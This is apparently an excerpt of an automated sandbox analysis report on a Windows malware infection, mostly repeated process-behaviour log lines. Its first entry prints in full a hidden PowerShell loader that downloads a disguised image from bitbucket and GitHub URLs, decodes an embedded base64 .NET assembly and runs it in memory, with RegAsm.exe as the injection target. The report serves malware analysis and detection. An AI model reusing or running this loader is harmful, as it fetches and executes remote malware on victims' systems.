                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414EED LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_00414EED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0045245D push esi; ret 13_2_00452466
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044A616 push ecx; ret 13_2_0044A629
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042C766 push ecx; ret 13_2_0042C779
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044AE78 push eax; ret 13_2_0044AE96
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404A3B ShellExecuteW,URLDownloadToFileW,13_2_00404A3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00413168 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_00413168

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414EED LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_00414EED
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
